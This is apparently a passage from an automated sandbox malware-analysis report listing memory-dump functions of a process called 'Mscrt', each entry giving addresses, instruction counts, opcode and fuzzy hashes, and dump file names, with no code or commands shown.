Opcode ID: ce4e93bd10ca0010af919e9fadfdc2a0d1cffa903e96afb9ff6226ea8be34981
Instruction ID: efe5c08c678a35a2525862f8030ef1704f201d1ed5e0907093af6043b64429b7
Opcode Fuzzy Hash: ce4e93bd10ca0010af919e9fadfdc2a0d1cffa903e96afb9ff6226ea8be34981
Instruction Fuzzy Hash: E4815731B1EA0B4BE3385AF898655BD77E1EF94314B16017ED08FC3193DEA8BA029751

Function 00007FFD9BFEE0B6 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bf8509940895acdaa6f9c0a8f76d2bf388e2fd651d5fc9f68967d0b41addbbb
Instruction ID: 7124660ee37e8d70e0b2602737d51f59137f72d19ca991d4fec7f95d9597ee62
Opcode Fuzzy Hash: 0bf8509940895acdaa6f9c0a8f76d2bf388e2fd651d5fc9f68967d0b41addbbb
Instruction Fuzzy Hash: F9818F31F0E60A4FE7B89F98A4255B577E1EF55310B16067EE08FC35A2DE2E7A418342

Function 00007FFD9BFE0B39 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f17addc7e0bc876d4c7a265619f1a34e8d1522c4724382f43f78ace68c67b09
Instruction ID: 6f48ec2aef4862eeec01bf2ff97c140f51d0be8e95fe134e22afd1f9508d1320
Opcode Fuzzy Hash: 4f17addc7e0bc876d4c7a265619f1a34e8d1522c4724382f43f78ace68c67b09
Instruction Fuzzy Hash: D9712632A0E94E4FE778DE6C88675B437D1FF44710B0603BAD49EC75B2DE19AA068781

Function 00007FFD9BC57446 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 542bea211b84530731a36fcd980598e956b4d489077113269a15ff00fb03a9bd
Instruction ID: b66e410174ef3d882dc28d6f6327a709bc0bb48b2d4b1f2f07df5b2b571e1818
Opcode Fuzzy Hash: 542bea211b84530731a36fcd980598e956b4d489077113269a15ff00fb03a9bd
Instruction Fuzzy Hash: D1715531B0E64A4FE3389BF894655797BE1EF41314B42057FD08F831A3DE68BA828742

Function 00007FFD9BC5C099 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c85c38e88dff113ec1e588b03f8ff440a5a424410b73e35c35210bf6a70be9c
Instruction ID: d19d0833ed79c92657f7cd851e3643e7a5139caa1c374ffac0ca2c55c82726f4
Opcode Fuzzy Hash: 8c85c38e88dff113ec1e588b03f8ff440a5a424410b73e35c35210bf6a70be9c
Instruction Fuzzy Hash: 98716935A0E44D4FE778DAE888665BF37D0FF44312B1202B9D09EC75B2DE58AA068781

Function 00007FFD9BFE3CFB Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d67902fa26a7127414612b15c3b02c6807889e6c40ed6586e123910dfeb0027f
Instruction ID: b9f7dc100ad1d9834f5f78ab2297f02f211463e9a5870bfbedf684d153a3fe92
Opcode Fuzzy Hash: d67902fa26a7127414612b15c3b02c6807889e6c40ed6586e123910dfeb0027f
Instruction Fuzzy Hash: A481E630E1E54E8EE77ADFA888696BCBBE1EF44300F510279D00ED71E5DE3A69498701

Function 00007FFD9BFE622A Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b4e45e0f06582640339d282e0947b7bcaa4d75b525ff73b463bbab3ca03f7ce
Instruction ID: 30c1d1700a611740b7d150d50f91cc7dc49e4490de0dd781baddeda52a7cf379
Opcode Fuzzy Hash: 3b4e45e0f06582640339d282e0947b7bcaa4d75b525ff73b463bbab3ca03f7ce
Instruction Fuzzy Hash: 4D911330A1DA4E9FEB2DCF54C4B16B57BA1FF42300F0546BDC04A8B1ABCA38A945CB41

Function 00007FFD9BFECDDB Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f69d68023fbbd6d0c4c354b92bffa777f09a5933e3f37c2ebed747ed944b637
Instruction ID: d6ce280b722b114f8ebbcc62fcf460000a5924aa26cad345798a8aa56633ebc0
Opcode Fuzzy Hash: 4f69d68023fbbd6d0c4c354b92bffa777f09a5933e3f37c2ebed747ed944b637
Instruction Fuzzy Hash: 1F81D430E1E54E8EEB64DFA48865AFDBBA0FF45300F5102BAE01ED71E5DE3969418711

Function 00007FFD9BC5CC5B Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39de4eea7c660091087da86ec716ed365ee279ff241e2206298d917fd4619a06
Instruction ID: 89e41b59a5a8079b21e86f74043faa689ac8d78b6c68bf4f8999426ca8eacbf5
Opcode Fuzzy Hash: 39de4eea7c660091087da86ec716ed365ee279ff241e2206298d917fd4619a06
Instruction Fuzzy Hash: 4371E530E1E54E8EEB65DBF488606BE7BA0FF55301F5101B9D05ED71E2DEA86A41C701

Function 00007FFD9BFE7251 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9c49cac35318d1b62637c6f22280971497c865651d861c9b0fcfcfe6060362
Instruction ID: 2f3d63745ca9f4a6af3e9a201f5945a05d80d7a1596a5a9639626bf586bd732c
Opcode Fuzzy Hash: ca9c49cac35318d1b62637c6f22280971497c865651d861c9b0fcfcfe6060362
Instruction Fuzzy Hash: 2A81C430B0EB4A8FE379CF54C1A95717BE1FF44304B51467DC48AC7AA2DA2AB942CB51

Function 00007FFD9BFE3162 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c465b73f9ba700457e8aa3cc44a677d83f7ec19a1d3e357d50f0697b08a2acfa
Instruction ID: 890b8d0a7f4251e0ab628351d3c9e6439ed12a0c661d0aa1150d5492d0287b64
Opcode Fuzzy Hash: c465b73f9ba700457e8aa3cc44a677d83f7ec19a1d3e357d50f0697b08a2acfa
Instruction Fuzzy Hash: AF610831B0E44D4FE779DE58886E5B437D0FF94310B0603B9D09EC79B2DE1AAA0A8781

Function 00007FFD9BFF9F70 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06800a4707a6c8ca74b333b14cb6fb0bae0ca5239e92d383cd9b364c7e7d9569
Instruction ID: c464f4ced78376a248de65d00977b44f7dee98d07acac142a02fb87ab6edfe0a
Opcode Fuzzy Hash: 06800a4707a6c8ca74b333b14cb6fb0bae0ca5239e92d383cd9b364c7e7d9569
Instruction Fuzzy Hash: 4581C230F0964D4FEBA9DF6888657A87BF1EF55300F0542FAD05DD3292DE3969858B01

Function 00007FFD9BC601A7 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3316b8cc93c08f8ff849db5ddf9e51c0f1609ce8b72db541fc6fd4b08684473e
Instruction ID: ba57fb1629587789c7d13fb5700c7324d57cc78f774d7c60a4f66c158c23cc1f
Opcode Fuzzy Hash: 3316b8cc93c08f8ff849db5ddf9e51c0f1609ce8b72db541fc6fd4b08684473e
Instruction Fuzzy Hash: 9C71E330A0EB0BCFE369CB64C1E097977E1FF14704B5145BEC08A87AA6DB69B942C741

Function 00007FFD9BC5F15A Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fae32a43d789e11c8badbe0564f1c36ceae46f1b4454ecbe7c04c52e03febd9
Instruction ID: a6d3abe002c912df3683de2029ad19929dd9769d780b6763e76bfff89ed10ed1
Opcode Fuzzy Hash: 1fae32a43d789e11c8badbe0564f1c36ceae46f1b4454ecbe7c04c52e03febd9
Instruction Fuzzy Hash: 2761033061E65A8BEB2D8FA4C4B047A3BA1FF45310B1544BDC48B8B29BCA7CF542CB41

Function 00007FFD9BC589E0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530ad96c38ee0a4edc749088c1ae5d65eeb70782c2ac077beec6d303f43e28b0
Instruction ID: 7cbcaf28bb53303f08073ac3bdc73d161b196fea245dbc52a5a743a797b1add8
Opcode Fuzzy Hash: 530ad96c38ee0a4edc749088c1ae5d65eeb70782c2ac077beec6d303f43e28b0
Instruction Fuzzy Hash: 5D51F630F1D55E4EEBA89BA848316F8B7A1FF54300F5042FAD09ED71E6DE287A418B41

Function 00007FFD9B890D50 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc9b9cfba9c32cf10495b8a48004d31e1198e55c8c9c853cf6dc68cee9fd620
Instruction ID: fe51b74124becd9a0b537cc31450a68d21688fdd328f9ea89cf828abe4764888
Opcode Fuzzy Hash: 3bc9b9cfba9c32cf10495b8a48004d31e1198e55c8c9c853cf6dc68cee9fd620
Instruction Fuzzy Hash: AE51AF61B18A4D4FEB959BAC98757ADBBF1FF59700F4100BAE049D72D6EE7828018701

Function 00007FFD9BFEBE4D Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2b58b51b0764c7eb02e7b19d8dbd2faf792dd76a60f9b01047182f0ad8eb662
Instruction ID: 5499788ed8708ebd13b98a599934a502b450dd40fe2c9c6b89592d221738f539
Opcode Fuzzy Hash: f2b58b51b0764c7eb02e7b19d8dbd2faf792dd76a60f9b01047182f0ad8eb662
Instruction Fuzzy Hash: 87410B31A0E6AD9FD716EFD8E8A14E9BFB0EF01354B0841BBD089DB193DA256505C740

Function 00007FFD9BC5D96D Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9588da3569a4ebc30fd94394fbf80dce1ba252104e7f86f7bd242382ab2dc4fc
Instruction ID: ef173a5e4cc563a354e3b3a8c93df906dfd39398589a798aba1d5a8181a9b493
Opcode Fuzzy Hash: 9588da3569a4ebc30fd94394fbf80dce1ba252104e7f86f7bd242382ab2dc4fc
Instruction Fuzzy Hash: 9151B771B2DA0E5FDB68DBF88461AACB7E1FF54314F114279D01DC72A2DE64B9028781

Function 00007FFD9BFE5B31 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a770b10ef51e97dc9150622f2a423df0edbeed074187c6a3f1d4615c3a86551a
Instruction ID: 93d91973c4b1686e200075fd12a4b4531b5eae6ba1291fd19e1a0641577b546a
Opcode Fuzzy Hash: a770b10ef51e97dc9150622f2a423df0edbeed074187c6a3f1d4615c3a86551a
Instruction Fuzzy Hash: 7B51AF70B1990A8BE758DF69C0A56B4B3D2FF58300F418279C00EC7A96DF39F9518B80

Function 00007FFD9BC60763 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9d75192ffc8bb02e9df8f5bbec60e6bfa3a0752c46f148d083be9ed64e31582
Instruction ID: 6b104e77bfc54b772eaff911793132680e101116d02881ba33db4d6c83a15336
Opcode Fuzzy Hash: a9d75192ffc8bb02e9df8f5bbec60e6bfa3a0752c46f148d083be9ed64e31582
Instruction Fuzzy Hash: F241843170C949CFDBA8EB68C4A5DB877E1FFA8710715017AD04AD32A6DE29F941CB81

Function 00007FFD9BC5614B Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b2f6e17912aba37ee7e2b473457fc014d0b580e38b04f4b32cfd4e6a6adbcf5
Instruction ID: 007f1af2c8d2ac4e0a001984df6671f0d8a35cb21a12c9179474a844fda2fe0f
Opcode Fuzzy Hash: 4b2f6e17912aba37ee7e2b473457fc014d0b580e38b04f4b32cfd4e6a6adbcf5
Instruction Fuzzy Hash: 1F419D30A1D54E8EEB69DBF488619FDB7B0EF45300F5504BAE01EC71E6DE386A428701

Function 00007FFD9BC5BCF4 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47fdef17aed1a7bdd39ec1b16021e2649b70f14363154cbfff5668216fe5ed01
Instruction ID: eb1606ece8db9a9705ea747c496f5d0fa2a80b7204b54aa6d3ea8365d40c0915
Opcode Fuzzy Hash: 47fdef17aed1a7bdd39ec1b16021e2649b70f14363154cbfff5668216fe5ed01
Instruction Fuzzy Hash: 0841F671A0EA9E8FDB56DFA8D8714EDBFB0EF05304B0501B7D049DB1A3DA1869058751

Function 00007FFD9B8908E8 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a70b5e62b47a219456a1f86a907a010c5f7c26abfe824480926b8683604b99e
Instruction ID: a3253943116a5a6ca80388e4b9f6655cb086c7a31a7fd73b13bb5392199106a4
Opcode Fuzzy Hash: 4a70b5e62b47a219456a1f86a907a010c5f7c26abfe824480926b8683604b99e
Instruction Fuzzy Hash: C831253130D9194FEB68EB5CF88A9B97BD0EF4932131501BAE58AC7166E911EC828781

Function 00007FFD9BC50AA7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fad3e68d2443fc781314896c9ee8a2c1a6eff472d2494b603691fad49bcc8f5
Instruction ID: dc3b51eac8105c8110dc2afc1a5f2ca5c15b1d9ac1cd0bdec721c3efd9ea3f62
Opcode Fuzzy Hash: 6fad3e68d2443fc781314896c9ee8a2c1a6eff472d2494b603691fad49bcc8f5
Instruction Fuzzy Hash: 4241917260C94C8FDF98EB6CD4A5DA9B3E1FBA971470441AAD04EC3192DE35E845CB81

Function 00007FFD9BFE7877 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36d96e925f792fdad6c73c81c57b1f9565047907fadd80f03000b3869e18ae5
Instruction ID: 8b6bc15940232157ecea31d940ff4fb1635cacf085413c488627704277a7d242
Opcode Fuzzy Hash: a36d96e925f792fdad6c73c81c57b1f9565047907fadd80f03000b3869e18ae5
Instruction Fuzzy Hash: 27412F3160D9498FDB9CEF2CD4699B877E1FB68310B1402AAD05EC3596DE31E985CB81

Function 00007FFD9BC607A7 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f1ddb5e3722b8350c0754c2c582728b2e54c69a85ae1f0be16e522152ce76d5
Instruction ID: f8f71027c1777738b3240e5701ddd24b52707021c78f7328066dc9b091929361
Opcode Fuzzy Hash: 8f1ddb5e3722b8350c0754c2c582728b2e54c69a85ae1f0be16e522152ce76d5
Instruction Fuzzy Hash: 4041763160C9498FDF9CEF28C4A5DA977E1FFA8720B05016AD04AD32A6DE35F845CB81

Function 00007FFD9BC59CB7 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75abae815bcf92e504d1ebb1aa24cd476ab7d592889e8dbc890f20044e884712
Instruction ID: f0681b21dccfeaf66d2248ec4442c5dfbeefe5f04b1b6571f349bab92ca6c8ed
Opcode Fuzzy Hash: 75abae815bcf92e504d1ebb1aa24cd476ab7d592889e8dbc890f20044e884712
Instruction Fuzzy Hash: 3A41543170C9489FEF9DEB68C4A5DA5B3E1FB6931471401AAD04EC3192DF29F855CB81

Function 00007FFD9BC60851 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b4f4e111a36b144bd03c40ca0201c2428008ae8e464ccf1c20b8c62c734831
Instruction ID: 09244004e8601cd970b88609750836cfb87eec1545c32896e1c73c37cf30fc35
Opcode Fuzzy Hash: f1b4f4e111a36b144bd03c40ca0201c2428008ae8e464ccf1c20b8c62c734831
Instruction Fuzzy Hash: C431733160C9498FDB9CEF28C4A5E6477E1FFB831471502AAD05AD72A6DE29F841CB81

Function 00007FFD9BC50B51 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30c7c1e44018a76ce5e3210a283f055b6b8cae8760ade697f8592ac40fcdfc6c
Instruction ID: 9d137db2f0ccf1df5b1d95b77e8ad100b2cf788104237da17004811b396f1d40
Opcode Fuzzy Hash: 30c7c1e44018a76ce5e3210a283f055b6b8cae8760ade697f8592ac40fcdfc6c
Instruction Fuzzy Hash: 0731A27160C9488FDB9DEF2CC4A5EA473E1FBA931470441A9D04EC7192DE34E845CB91

Function 00007FFD9BC59D61 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6940f7bdce26d2815174cd021bcba0dcb3bdca83e29c6bce034bab6e2076f05
Instruction ID: 57c9569fbf52f95b7f55af154f9785b820f642725ece9eaa0cb6e4ec6dd58aed
Opcode Fuzzy Hash: b6940f7bdce26d2815174cd021bcba0dcb3bdca83e29c6bce034bab6e2076f05
Instruction Fuzzy Hash: 5E31823170C9488FEB9DEB28C4A5DA4B3E1EBA931471401AAD05EC71A2DF28F855CB81

Function 00007FFD9BFE7921 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d53179cd5a540b01937f370256804c3ae78ad12312a3e017ae6cc116485d451
Instruction ID: 37b9065ea757b4a221b1b37f8e4090f3abc066cb17b81370a5eddfcfc11dac7f
Opcode Fuzzy Hash: 0d53179cd5a540b01937f370256804c3ae78ad12312a3e017ae6cc116485d451
Instruction Fuzzy Hash: 9E317F71608A498FDB5CEF2CC469E7473E1FBA8310B1402AAD05EC7592DE31EC85CB81

Function 00007FFD9B890998 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766161686d70264bdce9c8e297d88049e3e2e80c9b1ee34487332b3ca71a6d91
Instruction ID: 5e98f748dca4db65aab8342d9f4be5c87ed7f1d7a13b7288edf4e3aeb1ab0e69
Opcode Fuzzy Hash: 766161686d70264bdce9c8e297d88049e3e2e80c9b1ee34487332b3ca71a6d91
Instruction Fuzzy Hash: F631D424B19D1D1FEB98F76C946AA7976C2EB9C314F4140B9E40DC32E7ED28AC424641

Function 00007FFD9BC607EB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df27e5749e26c81ae0aa8943f3eca415fbf78e46e6e836fedf588343b57a44d2
Instruction ID: a2c88a6b5c7222c0760b54338dbf57d3a95173bb93122db86a672df581e2d5ba
Opcode Fuzzy Hash: df27e5749e26c81ae0aa8943f3eca415fbf78e46e6e836fedf588343b57a44d2
Instruction Fuzzy Hash: 3C31653160C9498FDB9CEF28C4A5DA477E1FFB8710B1501AAD04AD72A6DE29F841CB81

Function 00007FFD9BC50AEB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f918dcea0f6d78a6b89c4b9a52a5700812552e39ef5ec1a843a1a23fb1bc854b
Instruction ID: 30bb29a3867ef0fb0a9af472f701204d91c79555188ce44b011752b36603e312
Opcode Fuzzy Hash: f918dcea0f6d78a6b89c4b9a52a5700812552e39ef5ec1a843a1a23fb1bc854b
Instruction Fuzzy Hash: E031917160C9498FDF9CEF28C4A5EA8B3E1FB6971470441A9D04EC3192DE34E885CB81

Function 00007FFD9BC59CFB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a3211b83c1798d5aa003ed8c7783b4f41a1a45eb6b1b84f7e7a6ce6a0ad42d
Instruction ID: 75a05989034f7dd67aec47c6ee8b504f6958f7d6b733373f35630cc44fb3bc40
Opcode Fuzzy Hash: c4a3211b83c1798d5aa003ed8c7783b4f41a1a45eb6b1b84f7e7a6ce6a0ad42d
Instruction Fuzzy Hash: 7731603170C9499FEB9DEB68C4A5EA4B3E1FB6931071401AAD05EC71A2DF28F855CB81

Function 00007FFD9BFE78BB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 260c9b0341fbef87db0212c9cb778f16aa02b211e91e55e997a17f215f35f1c8
